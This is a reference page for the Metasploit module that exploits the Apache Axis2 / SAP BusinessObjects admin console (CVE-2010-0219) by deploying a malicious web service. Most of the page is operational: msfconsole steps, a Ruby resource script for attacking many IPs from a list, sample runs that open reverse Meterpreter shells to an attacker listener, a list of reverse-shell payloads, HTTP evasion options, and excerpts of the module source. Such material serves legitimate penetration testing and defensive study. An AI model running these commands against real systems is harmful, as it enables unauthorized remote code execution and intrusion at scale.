Axis2 / SAP BusinessObjects Authenticated Code Execution (via SOAP) - Metasploit


This page contains detailed information about how to use the exploit/multi/http/axis2_deployer metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Axis2 / SAP BusinessObjects Authenticated Code Execution (via SOAP)
Module: exploit/multi/http/axis2_deployer
Source code: modules/exploits/multi/http/axis2_deployer.rb
Disclosure date: 2010-12-30
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): Java, Linux, Windows
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2010-0219

This module logs in to an Axis2 Web Admin Module instance using a specific user/pass and uploads and executes commands via deploying a malicious web service by using SOAP.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Using axis2_deployer against a single host

Normally, you can use exploit/multi/http/axis2_deployer this way:

msf > use exploit/multi/http/axis2_deployer
msf exploit(axis2_deployer) > show targets
    ... a list of targets ...
msf exploit(axis2_deployer) > set TARGET target-id
msf exploit(axis2_deployer) > show options
    ... show and set options ...
msf exploit(axis2_deployer) > exploit

Using axis2_deployer against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your axis2_deployer will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/multi/http/axis2_deployer")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Description


This module logs in to an Axis2 Web Admin Module instance using a specific user/pass and uploads and executes commands via deploying a malicious web service by using SOAP.

Axis2 Web Admin


The Apache Axis2 Web application has three main sections:'Services' lists all the available services deployed in this server, 'Validate' checks the system to see whether all the required libraries are in place and views the system information, and 'Administration' is the Axis2 Web Administration module which is the console for administering the Apache Axis2 installation. The Axis2 Web Administration module provides a way to configure Axis2 dynamically.

IMPORTANT: This dynamic configuration will NOT be persistent, i.e., if the servlet container is restarted, then all the dynamic configuration changes will be lost.

Verification Steps


  1. Do: use exploit/multi/http/axis2_deployer
  2. Do: set RHOSTS [IP]
  3. Do: set RPORT [PORT]
  4. Do: set USERNAME [Username]
  5. Do: set PASSWORD [Password]
  6. Do: run

Scenarios


msf > use exploit/multi/http/axis2_deployer
msf exploit(axis2_deployer) > set RHOST 10.10.155.37
RHOST => 10.10.155.37
msf exploit(axis2_deployer) > set RPORT 8080
RPORT => 8080
msf exploit(axis2_deployer) > set USERNAME admin
USERNAME => admin
msf exploit(axis2_deployer) > set PASSWORD admin123
PASSWORD => admin123
msf exploit(axis2_deployer) > exploit

[*] Started reverse TCP handler on 10.10.155.39:4444 
[+] http://10.10.155.37:8080/axis2/axis2-admin [Apache-Coyote/1.1] [Axis2 Web Admin Module] successful login 'admin' : 'axis2'
[*] Successfully uploaded
[*] Polling to see if the service is ready
[*] Sending stage (30355 bytes) to 10.10.155.37
[*] Meterpreter session 3 opened (10.10.155.39:4444 -> 10.10.155.37:1750) at 2017-03-26 23:33:19 -0500

[*] NOTE: You will need to delete the web service that was uploaded.

[*] Using meterpreter:
[*] rm "webapps/axis2/WEB-INF/services/mdLFvgMv.jar"

[*] Using the shell:
[*] cd  "webapps/axis2/WEB-INF/services"
[*] del mdLFvgMv.jar


meterpreter > getuid
Server username: Administrator
meterpreter > sysinfo
Computer    : juan-6ed9db6ca8
OS          : Windows 2003 5.2 (x86)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...

Go back to menu.

Msfconsole Usage


Here is how the multi/http/axis2_deployer exploit module looks in the msfconsole:

msf6 > use exploit/multi/http/axis2_deployer

[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/http/axis2_deployer) > show info

       Name: Axis2 / SAP BusinessObjects Authenticated Code Execution (via SOAP)
     Module: exploit/multi/http/axis2_deployer
   Platform: Java, Linux, Windows
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2010-12-30

Provided by:
  Joshua Abraham <[email protected]>
  Chris John Riley

Available targets:
  Id  Name
  --  ----
  0   Java
  1   Windows Universal
  2   Linux X86

Check supported:
  No

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  PASSWORD  axis2            yes       The password for the specified username
  PATH      /axis2           yes       The URI path of the axis2 app (use /dswsbobje for SAP BusinessObjects)
  Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT     8080             yes       The target port (TCP)
  SSL       false            no        Negotiate SSL/TLS for outgoing connections
  USERNAME  admin            yes       The username to authenticate as
  VHOST                      no        HTTP server virtual host

Payload information:

Description:
  This module logs in to an Axis2 Web Admin Module instance using a 
  specific user/pass and uploads and executes commands via deploying a 
  malicious web service by using SOAP.

References:
  http://www.rapid7.com/security-center/advisories/R7-0037.jsp
  http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf
  https://nvd.nist.gov/vuln/detail/CVE-2010-0219
  OSVDB (68662)

Module Options


This is a complete list of options available in the multi/http/axis2_deployer exploit:

msf6 exploit(multi/http/axis2_deployer) > show options

Module options (exploit/multi/http/axis2_deployer):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  axis2            yes       The password for the specified username
   PATH      /axis2           yes       The URI path of the axis2 app (use /dswsbobje for SAP BusinessObjects)
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     8080             yes       The target port (TCP)
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   USERNAME  admin            yes       The username to authenticate as
   VHOST                      no        HTTP server virtual host

Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Java

Advanced Options


Here is a complete list of advanced options supported by the multi/http/axis2_deployer exploit:

msf6 exploit(multi/http/axis2_deployer) > show advanced

Module advanced options (exploit/multi/http/axis2_deployer):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FileDropperDelay                                                            no        Delay in seconds before attempting cleanup
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (java/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AESPassword                                   no        Password for encrypting communication
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   JavaMeterpreterDebug         false            no        Run the payload in debug mode, with logging enabled
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   Spawn                        2                yes       Number of subprocesses to spawn
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the multi/http/axis2_deployer module can exploit:

msf6 exploit(multi/http/axis2_deployer) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Java
   1   Windows Universal
   2   Linux X86

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the multi/http/axis2_deployer exploit:

msf6 exploit(multi/http/axis2_deployer) > show payloads

Compatible Payloads
===================

   #   Name                                     Disclosure Date  Rank    Check  Description
   -   ----                                     ---------------  ----    -----  -----------
   0   payload/generic/custom                                    normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                            normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                         normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/java/jsp_shell_bind_tcp                           normal  No     Java JSP Command Shell, Bind TCP Inline
   4   payload/java/jsp_shell_reverse_tcp                        normal  No     Java JSP Command Shell, Reverse TCP Inline
   5   payload/java/meterpreter/bind_tcp                         normal  No     Java Meterpreter, Java Bind TCP Stager
   6   payload/java/meterpreter/reverse_http                     normal  No     Java Meterpreter, Java Reverse HTTP Stager
   7   payload/java/meterpreter/reverse_https                    normal  No     Java Meterpreter, Java Reverse HTTPS Stager
   8   payload/java/meterpreter/reverse_tcp                      normal  No     Java Meterpreter, Java Reverse TCP Stager
   9   payload/java/shell/bind_tcp                               normal  No     Command Shell, Java Bind TCP Stager
   10  payload/java/shell/reverse_tcp                            normal  No     Command Shell, Java Reverse TCP Stager
   11  payload/java/shell_reverse_tcp                            normal  No     Java Command Shell, Reverse TCP Inline
   12  payload/multi/meterpreter/reverse_http                    normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
   13  payload/multi/meterpreter/reverse_https                   normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)

Evasion Options


Here is the full list of possible evasion options supported by the multi/http/axis2_deployer exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(multi/http/axis2_deployer) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Error uploading <RES>


Here is a relevant code snippet related to the "Error uploading <RES>" error message:

127:	    }, 25)
128:	
129:	    if (res and res.code == 200)
130:	      print_good("Successfully uploaded")
131:	    else
132:	      print_error("Error uploading #{res}")
133:	      return
134:	    end
135:	=begin
136:	  res = send_request_raw({
137:	    'uri'	 => "/#{datastore['PATH']}/axis2-web/HappyAxis.jsp",

The remote server responded expecting authentication


Here is a relevant code snippet related to the "The remote server responded expecting authentication" error message:

222:	            throw :stop # exit loop
223:	          elsif res and res.code == 401
224:	            if (res.headers['WWW-Authenticate'])
225:	              authmsg = res.headers['WWW-Authenticate']
226:	            end
227:	            print_error("The remote server responded expecting authentication")
228:	            if authmsg
229:	              print_error("WWW-Authenticate: %s" % authmsg)
230:	            end
231:	            raise ::Rex::ConnectionError
232:	            throw :stop # exit loop

WWW-Authenticate: %s


Here is a relevant code snippet related to the "WWW-Authenticate: %s" error message:

224:	            if (res.headers['WWW-Authenticate'])
225:	              authmsg = res.headers['WWW-Authenticate']
226:	            end
227:	            print_error("The remote server responded expecting authentication")
228:	            if authmsg
229:	              print_error("WWW-Authenticate: %s" % authmsg)
230:	            end
231:	            raise ::Rex::ConnectionError
232:	            throw :stop # exit loop
233:	          end
234:	        end

http://<RHOST>:<RPORT><RPATH>/(rest|services) Unable to authenticate (<RES.CODE> <RES.MESSAGE>)


Here is a relevant code snippet related to the "http://<RHOST>:<RPORT><RPATH>/(rest|services) Unable to authenticate (<RES.CODE> <RES.MESSAGE>)" error message:

232:	            throw :stop # exit loop
233:	          end
234:	        end
235:	      end
236:	    rescue ::Rex::ConnectionError
237:	      print_error("http://#{rhost}:#{rport}#{rpath}/(rest|services) Unable to authenticate (#{res.code} #{res.message})")
238:	    end
239:	  end
240:	
241:	  def exploit
242:	    user = datastore['USERNAME']

http://<RHOST>:<RPORT><RPATH>/axis2-admin not responding


Here is a relevant code snippet related to the "http://<RHOST>:<RPORT><RPATH>/axis2-admin not responding" error message:

253:	          'ctype'  => 'application/x-www-form-urlencoded',
254:	          'data'   => "userName=#{user}&password=#{pass}&submit=+Login+",
255:	        }, 25)
256:	
257:	        if not (res.kind_of? Rex::Proto::Http::Response)
258:	          print_error("http://#{rhost}:#{rport}#{rpath}/axis2-admin not responding")
259:	        end
260:	
261:	        if res.code == 404
262:	          print_error("http://#{rhost}:#{rport}#{rpath}/axis2-admin returned code 404")
263:	        end

http://<RHOST>:<RPORT><RPATH>/axis2-admin returned code 404


Here is a relevant code snippet related to the "http://<RHOST>:<RPORT><RPATH>/axis2-admin returned code 404" error message:

257:	        if not (res.kind_of? Rex::Proto::Http::Response)
258:	          print_error("http://#{rhost}:#{rport}#{rpath}/axis2-admin not responding")
259:	        end
260:	
261:	        if res.code == 404
262:	          print_error("http://#{rhost}:#{rport}#{rpath}/axis2-admin returned code 404")
263:	        end
264:	
265:	        srvhdr = res.headers['Server']
266:	        if res.code == 200
267:	          # Could go with res.headers["Server"] =~ /Apache-Coyote/i

http://<RHOST>:<RPORT><RPATH>/axis2-admin Unable to attempt authentication


Here is a relevant code snippet related to the "http://<RHOST>:<RPORT><RPATH>/axis2-admin Unable to attempt authentication" error message:

273:	            session = $1
274:	          end
275:	        end
276:	
277:	    rescue ::Rex::ConnectionError
278:	      print_error("http://#{rhost}:#{rport}#{rpath}/axis2-admin Unable to attempt authentication")
279:	    end
280:	
281:	
282:	    if not success and not rpath =~ /dswsbobje/
283:	      rpath = '/dswsbobje'

http://<RHOST>:<RPORT><RPATH>/axis2-admin not responding


Here is a relevant code snippet related to the "http://<RHOST>:<RPORT><RPATH>/axis2-admin not responding" error message:

289:	            'ctype'  => 'application/x-www-form-urlencoded',
290:	            'data'   => "userName=#{user}&password=#{pass}&submit=+Login+",
291:	          }, 25)
292:	
293:	        if not (res.kind_of? Rex::Proto::Http::Response)
294:	          print_error("http://#{rhost}:#{rport}#{rpath}/axis2-admin not responding")
295:	        end
296:	
297:	        if res.code == 404
298:	          print_error("http://#{rhost}:#{rport}#{rpath}/axis2-admin returned code 404")
299:	        end

http://<RHOST>:<RPORT><RPATH>/axis2-admin returned code 404


Here is a relevant code snippet related to the "http://<RHOST>:<RPORT><RPATH>/axis2-admin returned code 404" error message:

293:	        if not (res.kind_of? Rex::Proto::Http::Response)
294:	          print_error("http://#{rhost}:#{rport}#{rpath}/axis2-admin not responding")
295:	        end
296:	
297:	        if res.code == 404
298:	          print_error("http://#{rhost}:#{rport}#{rpath}/axis2-admin returned code 404")
299:	        end
300:	
301:	        srvhdr = res.headers['Server']
302:	        if res.code == 200
303:	          # Could go with res.headers["Server"] =~ /Apache-Coyote/i

http://<RHOST>:<RPORT><RPATH>/axis2-admin Unable to attempt authentication


Here is a relevant code snippet related to the "http://<RHOST>:<RPORT><RPATH>/axis2-admin Unable to attempt authentication" error message:

309:	            session = $1
310:	          end
311:	        end
312:	
313:	      rescue ::Rex::ConnectionError
314:	        print_error("http://#{rhost}:#{rport}#{rpath}/axis2-admin Unable to attempt authentication")
315:	      end
316:	    end
317:	
318:	    if success
319:	      print_good("http://#{rhost}:#{rport}#{rpath}/axis2-admin [#{srvhdr}] [Axis2 Web Admin Module] successful login '#{user}' : '#{pass}'")

http://<RHOST>:<RPORT><RPATH>/axis2-admin [<SRVHDR>] [Axis2 Web Admin Module] failed to login as '<USER>'


Here is a relevant code snippet related to the "http://<RHOST>:<RPORT><RPATH>/axis2-admin [<SRVHDR>] [Axis2 Web Admin Module] failed to login as '<USER>'" error message:

315:	      end
316:	    end
317:	
318:	    if success
319:	      print_good("http://#{rhost}:#{rport}#{rpath}/axis2-admin [#{srvhdr}] [Axis2 Web Admin Module] successful login '#{user}' : '#{pass}'")
320:	      upload_exec(session,rpath)
321:	    else
322:	      print_error("http://#{rhost}:#{rport}#{rpath}/axis2-admin [#{srvhdr}] [Axis2 Web Admin Module] failed to login as '#{user}'")
323:	    end
324:	  end
325:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • Joshua Abraham <jabra[at]rapid7.com>
  • Chris John Riley

Version


This page has been produced using Metasploit Framework version 6.1.28-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.